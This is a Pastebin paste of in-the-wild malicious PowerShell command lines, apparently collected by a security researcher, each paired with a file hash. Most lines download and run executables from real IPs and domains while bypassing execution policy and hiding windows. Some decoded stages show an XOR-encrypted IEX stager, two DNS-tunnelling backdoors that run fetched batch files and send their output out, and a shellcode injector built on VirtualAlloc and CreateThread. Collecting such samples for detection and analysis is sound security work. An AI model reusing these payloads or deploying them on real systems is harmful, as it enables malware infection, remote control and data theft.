SHARE
TWEET

Example Powershell payloads from @JohnLaTwC

a guest Sep 14th, 2016 1,883 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ###:BEGIN prepared by @JohnLaTwC
  2. C:\Windows\System32\cmd.exe /c powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.Webclient).DownloadFile('http://151.80.237.220/1.zip','C:\Users\User1\AppData\Roaming\WndUpdate\1.exe.zip'); (new-object -com shell.application).namespace('C:\Users\User1\AppData\Roaming\WndUpdate\').CopyHere((new-object -com shell.application).namespace('C:\Users\User1\AppData\Roaming\WndUpdate\1.exe.zip').Items(),16)
  3. 271f9ddefb620828a74fe2fb6794a8bbdab25078d06a0efe8f93f6d99b95b81e
  4. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  -NoP -sta -NonI -W Hidden -Enc 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 --> $wc=NEW-OBJEcT SYsteM.Net.WebCLiENt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};$wC.HeadeRS.Add('User-Agent',$u);$wc.PRoXy = [SYsTeM.NET.WEbREQUeST]::DEfaUlTWEBPROxy;$wC.PROXY.CReDenTIaLS = [SyStEM.NEt.CReDEnTIaLCACHE]::DEfAuLtNeTwOrKCREdeNTIAlS;$K='POTATOPOTATOPOTATOPOTATO';$i=0;[cHAR[]]$B=([cHaR[]]($Wc.DownLoadSTRiNg("https://54.165.117.232:443/index.asp")))|%{$_-bXOR$k[$I++%$k.LeNgtH]};IEX ($b-joIN'')
  5. 2897729dc0243f7066daa4f679bcd5a18bc4a08d37a14c7e67bf9437c8b269c9
  6. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "  &{ $f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('DQpTZXQgd3NzID0gQ3JlYXRlT2JqZWN0KCJ3U2NyaXB0LlNoZWxsIikNCg0KSE9NRSA9ICIldXNlcnByb2ZpbGUlXEFwcERhdGFcTG9jYWxcTWljcm9zb2Z0XE1lZGlhXCINCg0KDQpkbnNDbWQgPSAicG93ZXJzaGVsbCAtZXhlY3V0aW9ucG9saWN5IGJ5cGFzcyAtZmlsZSAiICYgSE9NRSAmICJkbi5wczEiDQoNCndzcy5SdW4gZG5zQ21kLDANCg0KDQoNCg==')); Add-Content 'C:\Users\User1\AppData\Local\Microsoft\Media\upd.vbs' $f;  $fdn=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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')); Add-Content 'C:\Users\User1\AppData\Local\Microsoft\Media\dn.ps1' $fdn; } "  -->  +++ Set wss = CreateObject("wScript.Shell")HOME = "%userprofile%\AppData\Local\Microsoft\Media\"dnsCmd = "powershell -executionpolicy bypass -file " & HOME & "dn.ps1"wss.Run dnsCmd,0 +++ $scriptdir = Split-Path -Parent -Path $MyInvocation.MyCommand.Definition$Global:domain = "googlednsupdate.tk"$Global:ID = "A1"$Global:dFold = $scriptdir + "\dn"$Global:uFold = $scriptdir + "\up"$Global:tFold = $scriptdir + "\te"$Global:hostLen = 10$Global:regExist = 0$Global:batExist = 0ipconfig /flushdnsFunction IIf($If, $Right, $Wrong) {If ($If) {$Right} Else {$Wrong}}function DNSRequest{    param( [string]$hostname )    $Stoploop = $false    [int]$Retrycount = "0"    $ret = [System.Net.IPAddress[]]("0.0.0.0")    $success = $false    do{        try{            $ret = [System.Net.IPAddress[]][System.Net.Dns]::GetHostAddresses($hostname)            $Stoploop = $true            $success = $true        }        catch{            $success = $false            if ($Retrycount -gt 20){                                $Stoploop = $true                throw            }            else {                            Start-Sleep -Seconds 2                $Retrycount = $Retrycount + 1            }        }    }    while($Stoploop -eq $false)    return $ret}function downip{ param( [int]$type ) 
$finished = 0 $filename = "" $fileID = 0 $reqStr = "IF"   $hostname = $reqStr[$type] + $Global:ID + (-join ((65..90) + (48..57) + (97..122) | Get-Random -Count 2 | % {[char]$_})) + "." + $Global:domain  $ipAddy = ([System.Net.IPAddress[]](DNSRequest $hostname))[0].GetAddressBytes()    if (($ipAddy[0] -eq $ipAddy[1]) -and ($ipAddy[0] -eq 63)) {        $fileID = [char]$ipAddy[2] + [char]$ipAddy[3]            $finishedFileName = [int]0    $namePart = [int]0    while($finishedFileName -eq 0){        $hostname = "P" + $fileID + [string]$namePart +  (-join ((65..90) + (48..57) + (97..122)| Get-Random -Count 2 | % {[char]$_})) + "."  + $Global:domain                $ipFileNameAddr = ([System.Net.IPAddress[]](DNSRequest $hostname))[0].GetAddressBytes()                if ($ipFileNameAddr[0] -eq 68)        {               if (($ipFileNameAddr[1] -eq 127) -or ($ipFileNameAddr[2] -eq 127) -or ($ipFileNameAddr[3] -eq 127)){                $finishedFileName = [int]1             }                                        $filename = $filename + (IIf ($ipFileNameAddr[1] -ne 127) ([char]$ipFileNameAddr[1]) "") + (IIf ($ipFileNameAddr[2] -ne 127) ([char]$ipFileNameAddr[2]) "") + (IIf ($ipFileNameAddr[3] -ne 127) ([char]$ipFileNameAddr[3]) "")            $namepart = [int]$namePart + [int]1        }            }            $finishedData = [int]0    $fsize = [int]0    $tempFilePath =  ($Global:tFold) + "\" + $filename        while($finishedData -eq 0){                $fileHdl = [io.file]::Open($tempFilePath,"Append");        $hostname = "D" + $fileID + (-join ((65..90) + (48..57) + (97..122)| Get-Random -Count 2 | % {[char]$_})) + (([string](mybase32UInt32 (Get-Item $tempFilePath).length)).Remove(0,2).Remove(5,1))  + "." 
+ $Global:domain         ([System.Net.IPAddress[]](DNSRequest $hostname)).GetEnumerator()| Sort-Object address | foreach{                                    if ([int]$_.GetAddressBytes()[0] -gt 130)            {                $sequenceIndex = [int]$_.GetAddressBytes()[0] - 240                                 if ([int]$_.GetAddressBytes()[1] -ne 127){                    $fileHdl.WriteByte($_.GetAddressBytes()[1])                                    }                if ([int]$_.GetAddressBytes()[2] -ne 127){                    $fileHdl.WriteByte($_.GetAddressBytes()[2])                }                if ([int]$_.GetAddressBytes()[3] -ne 127){                    $fileHdl.WriteByte($_.GetAddressBytes()[3])                }                if ([int]$_.GetAddressBytes()[3] -eq 127){                     $finishedData = 1                }                                            }        }        $fileHdl.Close()    }        $b64Data = [System.IO.File]::ReadAllBytes($tempFilePath)    $data = [System.Convert]::FromBase64CharArray($b64Data,0,$b64Data.Length)     $filePath =  ($Global:dFold) + "\" + $filename    [io.file]::WriteAllBytes($filePath,$data)    del $tempFilePath    return $filename }  return $filename}function upip{    param( [string]$fname )        $filePath = ($Global:tFold) + "\" + $fname    $success = 0        $hostname = "Y" + $Global:ID + (-join ((65..90) + (48..57) + (97..122)| Get-Random -Count 2 | % {[char]$_}))+ $fname.Replace(".","")  + "." 
+ $Global:domain         $respBytes = ([System.Net.IPAddress[]](DNSRequest $hostname))[0].GetAddressBytes()        if (($respBytes[0] -eq $respBytes[1]) -and ($respBytes[0] -eq [byte]74))    {        $uploadID = [char]$respBytes[2] + [char]$respBytes[3]                        $uploadedCompleteSize = [uint32]0        $fileData = (get-content $filePath -encoding byte)        $base32filedata = (base32data $fileData)        while($uploadedCompleteSize -lt $base32filedata.length)        {                                    $hostname = "Q" + $uploadID + ([string](mybase32UInt32 $uploadedCompleteSize)).Remove(0,2).Remove(5,1) + (-join $base32filedata[$uploadedCompleteSize..$($uploadedCompleteSize + $Global:hostLen-8)]) + "." + $Global:domain                                     $respBytes = ([System.Net.IPAddress[]](DNSRequest $hostname))[0].GetAddressBytes()                        if ([int]$respBytes[0] -eq 75)            {                $uploadedCompleteSize = [uint32]($respBytes[3]+$respBytes[2]*100+$respBytes[1]*10000)                                            }                            }                $hostname = "Z" + $uploadID + (-join ((65..90) + (48..57) + (97..122)| Get-Random -Count 2 | % {[char]$_}))  + "." 
+ $Global:domain         $respBytes = ([System.Net.IPAddress[]](DNSRequest $hostname))[0].GetAddressBytes()                if (([int]$respBytes[0] -eq 76) -and ([int]$respBytes[1] -eq 76) -and ([int]$respBytes[2] -eq 76) -and ([int]$respBytes[3] -eq 76))        {            del $filePath            return "OK"        }    }}function myToUint64{    param( [byte[]]$data )          $retUint = [uint64]0    $powCount = [int]0    for($len=($data.Length-1); $len -ge 0; $len--)    {        $retUint = $retUint + $data[$len] * [Math]::Pow(16,$powCount)        $powCount = $powCount + 2;            }        return $retUint}function base32data{    param( [byte[]]$data )        $ret = ""    if ($data.Length -eq 0) { return ret}    $charmap = "abcdefghijklmnopqrstuvwxyz012345"                for ($fiveByteIndex = 0;$fiveByteIndex -lt  [Math]::Ceiling($data.Length/5); $fiveByteIndex++) #    {                $bytes = [byte[]]$data[($fiveByteIndex * 5)..(IIF ($fiveByteIndex -lt ($data.Length/5)) (($fiveByteIndex*5)+4)  ($data.Length-1))]                        $number =  myToUint64 $bytes                $paddingBitRequire = (5 - (($bytes.Length * 8) % 5)) % 5         $outputB32Len = ($bytes.Length*8 + $paddingBitRequire)/5                for ($powIndex = ($bytes.Length*8 - 1) ; $powIndex -ge 4; $powIndex = $powIndex - 5)        {                     $ret = $ret + $charmap[[Math]::Pow(2,(-1 * $powIndex + 4))*($number -band [uint64]([Math]::Pow(2,$powIndex) + [Math]::Pow(2,$powIndex-1) + [Math]::Pow(2,$powIndex-2) + [Math]::Pow(2,$powIndex-3) + [Math]::Pow(2,$powIndex-4)))]                                       }                if ($powIndex -ge 0)         {                        switch ($powIndex)            {                0 {$ret = $ret + $charmap[$number -band [uint64](1)] + "6"}                1 {$ret = $ret + $charmap[$number -band [uint64](3)] + "7"}                2 {$ret = $ret + $charmap[$number -band [uint64](7)] + "8"}                3 {$ret = $ret + $charmap[$number 
-band [uint64](15)]+ "9"}            }         }                  }    return $ret        }function mybase32UInt32{    param([uint32]$inputnumber)    $ret = ""    $bytes = ([bitconverter]::GetBytes($inputnumber))    [array]::Reverse($bytes)    return (base32data $bytes)}Try{    if(-not(Test-Path -Path ($global:uFold))){        mkdir $global:uFold    }    if(-not (Test-Path -Path ($global:dFold))){        mkdir $global:dFold    }    if(-not (Test-Path -Path ($global:tFold))){        mkdir $global:tFold    }        if ((Get-ItemProperty -Path HKCU:\Software\Microsoft\FTP -Name ID  -ErrorAction SilentlyContinue) -ne $null)    {        $Global:ID = ([string]((Get-ItemProperty -Path HKCU:\Software\Microsoft\FTP -Name ID).ID)).Substring(0,2)            }        if ($Global:ID -eq "A1")    {        $hostname = "N" + (-join ((65..90) + (48..57) + (97..122)| Get-Random -Count 5 | % {[char]$_}))  + "." + $Global:domain                 $respBytes = ([System.Net.IPAddress[]](DNSRequest $hostname))[0].GetAddressBytes()                if (([int]$respBytes[0] -eq 61) -and ([int]$respBytes[1] -eq 61))        {            $Global:ID = [char]$respBytes[2] + [char]$respBytes[3]            New-ItemProperty -Path "HKCU:\Software\Microsoft\FTP" -Name "ID" -Value $Global:ID -PropertyType String -Force                    }    }        $hostname = "C" + $Global:ID + (-join ((65..90) + (48..57) + (97..122)| Get-Random -Count 2 | % {[char]$_}))  + "." + $Global:domain     $respBytes = ([System.Net.IPAddress[]](DNSRequest $hostname))[0].GetAddressBytes()                    if (([int]$respBytes[0] -eq 62))    {        $Global:regExist = $respBytes[1]        $Global:batExist = $respBytes[2]        $Global:hostLen  = $respBytes[3]            }        $hostname = "T" + $Global:ID + (-join ((65..90) + (48..57) + (97..122)| Get-Random -Count ($Global:hostLen-3) | % {[char]$_}))  + "." 
+ $Global:domain     $respBytes = ([System.Net.IPAddress[]](DNSRequest $hostname))[0].GetAddressBytes()        if (([int]$respBytes[0] -ne 65) -or ([int]$respBytes[1] -ne 65) -or ([int]$respBytes[2] -ne 65) -or ([int]$respBytes[3] -ne $Global:hostLen))    {        $Global:hostLen = 10             }    while ($Global:regExist -gt 0)    {        $ret = downip 1                $Global:regExist = $Global:regExist - 1    }    while ($Global:batExist -gt 0)    {        $filename = ""        $filename = downip 0                 if ($filename -ne "")        {            $batchFilePath = $Global:dFold + "\" + $filename                        Rename-Item $batchFilePath    ($batchFilePath+".bat")            $batchFilePath = $batchFilePath+".bat"            $resultFilePath = $global:uFold + '\' + $filename                        Invoke-Expression (($batchFilePath -replace ' ', '` ') + ' > ' + ($resultFilePath -replace ' ', '` '));            del ($batchFilePath)            $Global:batExist = $Global:batExist -1                         }    }    Get-ChildItem $global:uFold -force |   % {        $_.FullName         $_.Name         move $_.FullName ($Global:tFold + "\" + $_.Name)        upip ($_.Name)    }}catch{    $hostname = "E" + $Global:ID + (-join ((65..90) + (48..57) + (97..122)| Get-Random -Count 2 | % {[char]$_})) +([string]$_.InvocationInfo.ScriptLineNumber) + "." + $Global:domain         [System.Net.Dns]::GetHostAddresses($hostname)    }
  7. 293522e83aeebf185e653ac279bba202024cedb07abc94683930b74df51ce5cb
  8. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "&{$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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')); Set-Content 'C:\Users\Public\Libraries\fireeye.vbs' $f;$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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')); Set-Content 'C:\Users\Public\Libraries\fireeye.ps1' $f;(Get-Content $env:Public\Libraries\fireeye.vbs) -replace '__',(Get-Random) | Set-Content $env:Public\Libraries\fireeye.vbs}" -->  +++ HOME="%public%\Libraries\"SERVER="http://upgradesystems.info/upgrade-index.aspx?req=__\"Dwn="powershell ""&{$wc=(new-object System.Net.WebClient);$wc.UseDefaultCredentials=$true;$wc.Headers.add('Accept','*/*');$wc.Headers.add('User-Agent','Microsoft BITS/7.7');while(1){try{$r=Get-Random;$wc.DownloadFile('"&SERVER&"-_&m=d','"&HOME&"dn\'+$r+'.-_');Set-Content -Path ('"&HOME&"dn\'+$r+'.-_') -Value ([System.Convert]::FromBase64String((Get-Content -Path ('"&HOME&"dn\'+$r+'.-_')))) -Encoding Byte;$cd=$wc.ResponseHeaders['Content-Disposition'];Rename-Item -path ('"&HOME&"dn\'+$r+'.-_') -newname ($cd.Substring($cd.IndexOf('filename=')+9))}catch{break}}}"""CreateObject("WScript.Shell").Run Replace(Dwn,"-_","dwn"),0DownloadExecute="powershell ""&{$wc=(new-object System.Net.WebClient);$wc.UseDefaultCredentials=$true;$wc.Headers.add('Accept','*/*');$wc.Headers.add('User-Agent','Microsoft BITS/7.7');$r=Get-Random;$wc.DownloadFile('"&SERVER&"-_&m=d','"&HOME&"dn\'+$r+'.-_');Set-Content -Path ('"&HOME&"dn\'+$r+'.-_') -Value ([System.Convert]::FromBase64String((Get-Content -Path ('"&HOME&"dn\'+$r+'.-_')))) -Encoding Byte;Invoke-Expression ('"&HOME&"dn\'+$r+'.-_ >"&HOME&"up\'+$r+'-_');$cd=$wc.ResponseHeaders['Content-Disposition'];Rename-Item -path ('"&HOME&"up\'+$r+'-_') -newname ($cd.Substring(($cd.IndexOf('filename=')+9),($cd.Length-25))+'.bat.txt');Get-ChildItem "&HOME&"up\ | ForEach-Object {if((Get-Item 
($_.FullName)).length -gt 0){[System.Convert]::ToBase64String(([System.IO.File]::ReadAllBytes($_.FullName))) | Out-File $_.FullName;$wc.UploadFile('"&SERVER&"upl&m=u',$_.FullName);waitfor haha /T 3};Remove-Item $_.FullName};Remove-Item ('"&HOME&"dn\'+$r+'.-_')}"""CreateObject("WScript.Shell").Run Replace(DownloadExecute,"-_","bat"),0DnsCmd="powershell -ExecutionPolicy Bypass -File "&HOME&"fireeye.ps1"CreateObject("WScript.Shell").Run DnsCmd,0 +++ $global:myhost = '.upgradesystems.info'$global:filename = ''$global:myflag = 0$global:myid = '###'$global:myhome = "$env:Public\Libraries\"function convertTo-Base36 ($decNum=""){    $decNum %= 46656    $alphabet = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"    do    {        $remainder = ($decNum % 36)        $char = $alphabet.substring($remainder,1)        $base36Num = "$char$base36Num"        $decNum = ($decNum - $remainder) / 36    }    while ($decNum -gt 0)    $base36Num.PadLeft(3,'0')}function GetSub($myflag2, $cmdid='00', $partid='000'){    if($myflag2 -eq 0)    {    ('ww000000'+(convertTo-Base36(Get-Random -Maximum 46655)))    }    elseif($myflag2 -eq 1)    {        ('ww'+$global:myid+'00000'+(convertTo-Base36(Get-Random -Maximum 46655)))    }    elseif($myflag2 -eq 2)    {        ('ww'+$global:myid+$cmdid+$partid+(convertTo-Base36(Get-Random -Maximum 46655)))    }}function Str2Hex($mystr){    [System.BitConverter]::ToString([System.Text.Encoding]::Default.GetBytes($mystr)).Replace("-", "")}function Alive{    if($global:myid -eq '#'+'##')    {        return 0    }    SendReceiveDNS ((GetSub 1)+'30')    $sub = ((GetSub 1)+'232A') + (Str2Hex $global:filename)    $i = 1    $ret = 0    while($global:myflag -eq 1)    {        $ret = 1        $sub2 = $sub + (Str2Hex $i)        SendReceiveDNS $sub2        $i++    }    if($ret -eq 1)    {        FixBatFile ($global:myhome+'tp\'+$global:filename+".bat")    }    $ret}function SendReceiveDNS ($d){    $cnt = 0    while ($cnt -lt 20)    {        try        {            $mydata = 
([System.Net.DNS]::GetHostByName($d+$global:myhost).AddressList[0])            $mydata = ($mydata | ForEach-Object {$_.IPAddressToString})            $cnt = 25        }        catch        {            Start-Sleep -m 500            $cnt++        }    }    if(-not($cnt -eq 25))    {        ('#'+'##')    }    elseif($global:myflag -eq 0 -and $mydata.StartsWith('33.33.'))    {        $tmp = $mydata.SubString(6).Split('.')        $global:filename = ([char] [int] $tmp[0]) + ([char] [int] $tmp[1])        $global:myflag = 1    }    elseif ($mydata.Equals('35.35.35.35'))    {        $global:myflag = 0    }    elseif ($global:myflag -eq 1)    {        $tmp = $mydata.Split('.')        [System.IO.File]::AppendAllText($global:myhome+'tp\'+$global:filename+".bat", (([char] [int] $tmp[0]) + ([char] [int] $tmp[1]) + ([char] [int] $tmp[2]) + ([char] [int] $tmp[3])))    }    elseif($global:myid -eq '#'+'##')    {        ([char] [int] $mydata.Split('.')[0])    }}function FixBatFile ($batpath){    (Get-Content $batpath).Substring(10) | Set-Content $batpath}function SendFile($myFilePath){    $myFileName = [System.IO.Path]::GetFileNameWithoutExtension($myFilePath)    $mystr = [System.IO.File]::ReadAllText($myFilePath)    $i=0    $mytemp = ''    $j=0    while($i -le $mystr.Length)    {        $mytemp += $mystr[$i]        if((($i%24) -eq 23) -or ($i -eq $mystr.Length))        {            $myhex = Str2Hex $mytemp            SendReceiveDNS ((GetSub 2 $myFileName (convertTo-Base36 $j)) + $myhex)            $j++            $mytemp = ''        }        $i++    }}function GetID{    $global:myid = SendReceiveDNS ((GetSub 0)+'30')}function ChangeThisFile ($botid){    (Get-Content $env:Public\Libraries\fireeye.ps1) -replace ('#'+'##'),$botid | Set-Content $env:Public\Libraries\fireeye.ps1}function Init{    if($global:myid -eq ('#'+'##'))    {        md -Force ($global:myhome+'tp\')        GetID        ChangeThisFile $global:myid    }}function main{    Init    if(Alive -eq 1)    {        
Invoke-Expression ($global:myhome+'tp\'+$global:filename+'.bat > '+$global:myhome+'tp\'+$global:filename+'.txt')        SendFile ($global:myhome+'tp\'+$global:filename+'.txt')        Remove-Item ($global:myhome+'tp\'+$global:filename+'.bat')        Remove-Item ($global:myhome+'tp\'+$global:filename+'.txt')    }}main
  9. f3856c7af3c9f84101f41a82e36fc81dfc18a8e9b424a3658b6ba7e3c99f54f2
  10. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (new-obJect systeM.net.webcLient).downLoadfiLe('""https://luanjoaquimyuri777.box.com/shared/static/gfyyk4758zen4be1owf3zr536dm644wg.jpg','C:\Users\User1\AppData\Local\Temp\HOSTNAME4-WIN81_User1_owoze.dLL');start-process rundLL32.exe C:\Users\User1\AppData\Local\Temp\HOSTNAME4-WIN81_User1_owoze.dLL,starter""
  11. 65fa6ebe6f112511db70a4c59a64999dcf9a528ed5154a4f5f9e557dd9612989
  12. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -EncodedCommand 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   --> PowerShell -ExecutionPolicy Restricted -command (New-Object System.Net.WebClient).DownloadFile('http://185.35.138.22/take/titatt.exe', $env:TEMP\levellgf.exe );Invoke-Item ( $env:TEMP\levellgf.exe )
  13. c0bacc6ceda670f15d7588c969bd6d4b1736ecf2ffa6d00039d858690d84c90b
  14. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://brucetang.com/wp-content/plugins/libravatar-replace/systemdll.exe','mess.exe');(New-Object -com Shell.Application).ShellExecute('mess.exe');
  15. cf1ddf4f1aec9da25a54a935c820ac3ca32d3271c2cfe69132f9ae26d8a702f2
  16. ed19e06dea064f8808863ef4bb631681879bd6aae00e4606a2cb63c1f6a6c489
  17. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy ByPass -NoProfile -command (New-Object System.Net.WebClient).DownloadFile('http://ch.hotel-adelboden.ch/forums/en/forums.php','C:\Users\User1\AppData\Local\Temp\Bia3d.exE');Start 'C:\Users\User1\AppData\Local\Temp\Bia3d.exE';
  18. 9d25e03f67b942ea5a6144f846010641faf3df8d73b77ad46fabd474176057a2
  19. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Unrestricted -File "C:\Users\User1\AppData\Local\Temp\ps.ps1"
  20. 24a018dc82de576b1939c21078c5ece9bbe866a5ea549eb5916669232189e909
  21. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noexit -ExecutionPolicy bypass -noprofile -file C:\Users\User1\AppData\Local\Temp\adobeacd-update.ps1
  22. 84dbeb770a728c415340d4ed6b8fd9fd66ca706e312464f1b68edd9fdf0aa0db
  23. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noexit -noprofile -enc "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"
  24. 344f26f6e3f7aca482086a37666860a2bde7f86d212ed84c0af830481866c1b4
  25. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WiNdOwStyle HiddeN -ExecutionPolicy Bypass -noloGo -noprofile (New-Object System.Net.WebClient).DownloadFile('HTTp://labravax.top/f.php','C:\Users\User1\AppData\Local\Temp\updater.ps1');
  26. fd0c23b388b6b55ea936e47cddc286354201ddbd6b81bcb3d68a2d73c1a6bdd2
  27. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -nop -w hidden -c "Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope Process; do{ IEX ((new-object net.webclient).downloadstring('https://www.payu.news/j/e8c07f0c/')); Start-Sleep -s 1800;}while(1);" -->  +++ $c = @"[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z);[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z);[DllImport("msvcrt.dll")] public static extern IntPtr memset(IntPtr x, uint y, uint z);"@$o = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru$x=$o::VirtualAlloc(0,0x1000,0x3000,0x40); [Byte[]]$sc = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x6e,0x65,0x74,0x00,0x68,0x77,0x69,0x6e,0x69,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xe8,0x80,0x00,0x00,0x00,0x4d,0x6f,0x7a,0x69,0x6c,0x6c,0x61,0x2f,0x35,0x2e,0x30,0x20,0x28,0x63,0x6f,0x6d,0x70,0x61,0x74,0x69,0x62,0x6c,0x65,0x3b,0x20,0x4d,0x53,0x49,0x45,0x20,0x39,0x2e,0x30,0x3b,0x20,0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x20,0x4e,0x54,0x20,0x36,0x2e,0x31,0x3b,0x20,0x57,0x4f,0x57,0x36,0x34,0x3b,0x20,0x54,0x72,0x69,0x64,0x65,0x6e,0x74,0x2f,0x35,0x2e,0x30,0x3b,0x20,0x4e,0x50,0x30,0x36,0x29,0x00,0x58,0x58,0x58,
0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x00,0x59,0x31,0xff,0x57,0x57,0x57,0x57,0x51,0x68,0x3a,0x56,0x79,0xa7,0xff,0xd5,0xeb,0x79,0x5b,0x31,0xc9,0x51,0x51,0x6a,0x03,0x51,0x51,0x68,0x50,0x00,0x00,0x00,0x53,0x50,0x68,0x57,0x89,0x9f,0xc6,0xff,0xd5,0xeb,0x62,0x59,0x31,0xd2,0x52,0x68,0x00,0x02,0x60,0x84,0x52,0x52,0x52,0x51,0x52,0x50,0x68,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x89,0xc6,0x31,0xff,0x57,0x57,0x57,0x57,0x56,0x68,0x2d,0x06,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x74,0x44,0x31,0xff,0x85,0xf6,0x74,0x04,0x89,0xf9,0xeb,0x09,0x68,0xaa,0xc5,0xe2,0x5d,0xff,0xd5,0x89,0xc1,0x68,0x45,0x21,0x5e,0x31,0xff,0xd5,0x31,0xff,0x57,0x6a,0x07,0x51,0x56,0x50,0x68,0xb7,0x57,0xe0,0x0b,0xff,0xd5,0xbf,0x00,0x2f,0x00,0x00,0x39,0xc7,0x74,0xbc,0x31,0xff,0xeb,0x15,0xeb,0x49,0xe8,0x99,0xff,0xff,0xff,0x2f,0x57,0x5a,0x76,0x70,0x00,0x00,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x68,0x00,0x00,0x40,0x00,0x57,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x53,0x89,0xe7,0x57,0x68,0x00,0x20,0x00,0x00,0x53,0x56,0x68,0x12,0x96,0x89,0xe2,0xff,0xd5,0x85,0xc0,0x74,0xcd,0x8b,0x07,0x01,0xc3,0x85,0xc0,0x75,0xe5,0x58,0xc3,0xe8,0x37,0xff,0xff,0xff,0x32,0x31,0x33,0x2e,0x31,0x36,0x33,0x2e,0x37,0x33,0x2e,0x33,0x34,0x00;for ($i=0;$i -le ($sc.Length-1);$i++) {$o::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1) | out-null;}$z=$o::CreateThread(0,0,$x,0,0,0); Start-Sleep -Second 100000
  28. 7aebf07dac69a432c1aa6dfe5312aab4aeb37e269d6da8131b2c74b1c805b0c2
  29. PoWerSHElL  (nEW-oBjEcT sYsTeM.neT.wEBcLiEnT).dOWNLOadfIlE('http://app2.dopplerfiles.net/201502/setspns.exe','C:\Users\User1\AppData\Roaming\putty.exe');
  30. 1fa080977c33786ec4526ddd02e11c0bd2ffb119c630fee7870d9e85b3208d13
  31. PoWerSHElL  (nEW-oBjEcT sYsTeM.neT.wEBcLiEnT).dOWNLOadfIlE('http://crystalbrighlplastic.com/tt/Quotationn.exe','C:\Users\User1\AppData\Local\Temp\Win rar.exe');
  32. 24c5d644c56ff03b26d44cdf21ca07ec05b1b315ebcab02c5fde3db746483bee
  33. powershell  add-appxpackage \\winbuilds\release\RS_EDGE_APP_EAL\14877.1008.160711-1000\x86fre\bin\FPA\PdfReader\PdfReader.appx
  34. 4869d5c6a4222201677d18e3535ca5ee64691e86011f3ff4e340fd572ab9fdcc
  35. powershell  -Command "(New-Object Net.WebClient).DownloadFile('http://rebrand.ly/comwe3d9a', 'C:\Users\User1\AppData\Local/Bigtoloop/12U80OB6DF3H3U3AXDRB.zip')"
  36. da53176f68c2121b53b42a600af0913e29024dc5998502c173906096f6478860
  37. powershell  -ExecutionPolicy ByPass -NoProfile -command (New-Object System.Net.WebClient).DownloadFile('http://redirect.immotinguely.ch/customer/Auth/CloudOffice.php','C:\Users\User1\AppData\Local\Temp\bBJjqwe3.exE');Start 'C:\Users\User1\AppData\Local\Temp\bBJjqwe3.exE';
  38. 77f9a8f6b01b8bf75409a53d2ec360aacd5bc00e80aba532765aa1821b2496cf
  39. poWershell  -ExecutionPolicy ByPass -NoProfile -command (New-Object System.Net.WebClient).DownloadFile('http://sol.sol-airconcept-vs.ch/13ub4ryi5jn/b43/97h3uine.php','C:\Users\User1\AppData\Local\Temp\ghHJVsa3d.exE');Start 'C:\Users\User1\AppData\Local\Temp\ghHJVsa3d.exE';
